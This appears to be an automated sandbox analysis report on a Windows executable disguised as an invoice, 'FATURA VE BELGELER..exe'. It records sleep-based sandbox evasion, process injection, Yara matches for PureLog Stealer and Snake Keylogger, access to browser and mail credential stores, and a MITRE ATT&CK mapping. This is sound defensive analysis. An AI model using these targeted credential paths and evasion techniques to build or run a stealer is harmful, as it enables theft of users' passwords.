Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594908	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594577	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594248	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 593916	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 593812	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592361	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592250	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592137	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591919	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591812	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591651	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Window / User API: threadDelayed 6854			Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Window / User API: threadDelayed 2983			Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 4956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2412	Thread sleep count: 6854 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2412	Thread sleep count: 2983 > 30	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -598779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -598540s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -598386s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -597053s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596561s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596294s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596182s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -596039s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595910s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594248s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -593916s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -593812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -592361s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -592250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -592137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -592031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -591919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -591812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556	Thread sleep time: -591651s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598540	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598386	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 597053	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596779	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596294	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596182	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596039	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595910	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594908	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594577	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594248	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 593916	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 593812	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592361	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592250	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592137	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591919	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591812	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 591651	Jump to behavior

Source: FATURA VE BELGELER..exe, 00000003.00000002.4443408450.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Memory written: C:\Users\user\Desktop\FATURA VE BELGELER..exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Process created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"

Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Users\user\Desktop\FATURA VE BELGELER..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Users\user\Desktop\FATURA VE BELGELER..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.5400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d49e0c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d47df4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d46ddc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.5400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d49e0c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d47df4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.2d46ddc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
